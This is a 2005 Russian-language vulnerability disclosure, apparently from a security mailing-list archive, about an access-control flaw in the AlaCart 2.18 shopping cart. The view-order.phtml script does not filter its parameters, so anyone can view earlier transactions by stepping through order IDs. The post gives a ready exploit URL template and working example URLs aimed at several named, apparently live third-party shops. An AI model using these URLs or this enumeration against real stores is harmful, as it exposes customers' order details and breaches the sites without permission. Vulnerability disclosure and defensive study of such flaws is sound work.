Related information

PHP/ASP/CGI web applications security flaws

[EXPL] ITA Forum SQL Injection

[Full-Disclosure] Minis directory traversal vulnerability

[Full-Disclosure] phpGiftReq SQL Injection

XSS in the nested BB tag in  many forum

From:	durito <durito_(at)_mail.ru>
Date:	11.01.2005
Subject:	уязвимость в AlaCart Version 2.18

Обнаружена уязвимость в системе AlaCart Version 2.18

Software / Application - Alabanza AlaCart Shopping Cart
Problem-Type - удаленная
Vulnerability - просмотр информации о транзакциях.
Vendor - alabanza.com
Risk / Severity - низкий
Exploit - http://www.xxx.com/s-cart/view-order.phtml?f_strFirstName=[любые символы]&&f_strLastName=[любые
символы]&f_intOrderID=[номер транзакции]

файл view-order.phtml не фильтрует параметры, поэтому возможен просмотр информации о проведенных ранее
транзакциях магазина, минуя ввод пароля/логина администратора.
номер транзакции подбирается обычным перебором 1,2,3...121 и так далее. В случае отсутствия записи о
имеющейся транзакции, ответ сервера:
Order #135 could not be found or does not exist.
пример:
http://alacart.metapros.net/s-cart/view-order.phtml?f_strFirstName=Jeff&f_strLastName=Daggs&f_intOrderID=135

пример уязвимости:
http://notebookmaker.com/s-cart/view-order.phtml?f_strFirstName=aaa&f_strLastName=aaaa&f_intOrderID=128
http://kingfishtackle.com/s-cart/view-order.phtml?f_strFirstName=bbb&f_strLastName=bbb&f_intOrderID=163
http://www.arsenaltraining.com/s-cart/view-order.phtml?f_strFirstName=durito&f_strLastName=durito&f_intOrderID=134
http://lightlens.com/s-cart/view-order.phtml?f_strFirstName=333&f_strLastName=333&f_intOrderID=121
http://www.asbp.org/s-cart/view-order.phtml?f_strFirstName=444&f_strLastName=444&f_intOrderID=121


http://lwb57.org
mail: durito@mail.ru